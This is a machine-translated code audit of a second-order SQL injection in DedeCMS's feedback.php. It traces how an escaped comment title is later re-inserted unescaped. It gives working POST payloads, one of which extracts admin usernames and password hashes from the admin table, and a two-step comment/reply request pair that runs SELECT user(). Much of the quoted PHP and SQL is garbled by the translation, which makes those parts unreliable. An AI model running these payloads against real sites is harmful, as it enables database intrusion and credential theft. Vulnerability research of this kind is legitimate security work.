Code Auditing: DEDECMS uses a method to inject Vulnerabilities

Vulnerability file:/plus/feedback. php

 

 

If ($ comtype = 'comments') // the problem starts from here {$ arctitle = addslashes ($ title ); // $ title is the key. Without the initialization of addslashes, our $ title is escaped. For example, we pass in 1' $ arctitle = 1 \ '$ typeid = intval ($ typeid ); // These are soy sauce $ ischeck = intval ($ ischeck); // These are soy sauce $ feedbacktype = preg_replace ("# [^ 0-9a-z] # I ", "", $ feedbacktype); if ($ msg! = '') // $ Msg if not empty, continue to go down {$ inquery =" insert into 'dede _ feedback' ('aid ', 'typeid', 'username ', 'artitle', 'IP', 'ischeck', 'dtime', 'mid, 'bad', 'good', 'ftype', 'face', 'msg ') VALUES ('$ aid', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime ', '{$ pai_ml-> M_ID}', '0', '0', '$ feedbacktype', '$ face', '$ msg ');";

// $ Arctitle is introduced into the $ inquery SQL statement to check the effect.

 

 

 

 

 

Continue to read the code.

 

 

$ Rs = $ dsql-> ExecuteNoneQuery ($ inquery ); // ExecuteNoneQuery sends an SQL statement // Think About It. Since the value of $ arctitle is not escaped after $ inquery is inserted into the database, we should try to use it to continue reading if (! $ Rs) // The {ShowMsg ('comment error! ','-1'); exit () ;}}// reference the reply elseif ($ comtype = 'reply ') // The second key {$ row = $ dsql-> GetOne ("SELECT * FROM 'dede _ feedback' WHERE id = '$ fid '"); // check the SQL statement // SELECT * FROM 'dede _ feedback' WHERE id = '$ fid'. Isn't this the table we just inserted? $ fid is passed by get.

 

 

 

 

 

 

Look down

 

 

 

$ Arctitle = $ row ['artle tle']; // are you excited here? Get the value of the arctitle field in the database and give it to $ arctitle to see where $ arctitle is brought in. $ aid = $ row ['aid ']; // These are soy sauce $ msg = $ quotemsg. $ msg; // These are soy sauce $ msg = HtmlReplace ($ msg, 2 ); // These are soy sauce $ inquery = "insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artle tle', 'IP ', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype', 'face', 'msg') VALUES ('$ aid ', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime', '{$ cfg_ml-> M_ID }', '0', '0', '$ feedbacktype', '$ face',' $ msg ')"; // $ arctitle is brought into $ inquery. Here we construct the echo $ inquery statement.

 

 

 

 

 

$ Dsql-> ExecuteNoneQuery ($ inquery); // use ExecuteNoneQuery to send SQL statements. Let's take a look at this function.
/*
* // Execute an SQL statement that does not return results, such as update, delete, and insert.
Function ExecuteNoneQuery ($ SQL = "){...}
* If no result is returned, an error is returned. We can only create other exp values.
* Idea 1:
* During the First insert operation, we construct $ arctitle = 1, @ ''', 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit), (, 1, '1
* Http: // localhost/dede/uploads/plus/feedback. php
* Post
* Action = send & comtype = comments & aid = 16 & isconfirm = yes & feedbacktype = feedback & face = 1 & msg = 33333 & notuser = 1 & validate = gram & typeid = 12 & title = 1, @ ''', 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit )), (1, 1, '1
*
* At the time of retrieval, 2nd SQL statements should be changed:
* Insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime ', 'Mid ', 'bad', 'good', 'ftype', 'face', 'msg') VALUES ('16', '0', 'tourists ', '1, @ ''', 1, 1, 1, 1, 1, 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit 127), (, 1, '1. 0.0.1 ', '1', '000000', '0', '0', '0', 'feedback', '0 ′,")

 

 

 

 

 

 

/* This audit ends here. The final exp is only available for select user (). You can think twice.
* The first post statement
* Http: // localhost/dede/uploads/plus/feedback. php
* Post
*

 

action=send&comtype=comments&aid=13&isconfirm=yes&feedbacktype=feedback&face=1&msg=22222&notuser=1&validate=gram&typeid=12&title=',@`'`,1,1,1,1,1,1,1,(SELECT user())),(1,

 

 

 

 

 

 

 

* The 2nd post statement // aid must be the same as the above fid.
* Http: // localhost/dede/uploads/plus/feedback. php
*

 

action=send&comtype=reply&aid=13&isconfirm=yes&feedbacktype=feedback&validate=upse&fid=9

 

 

*/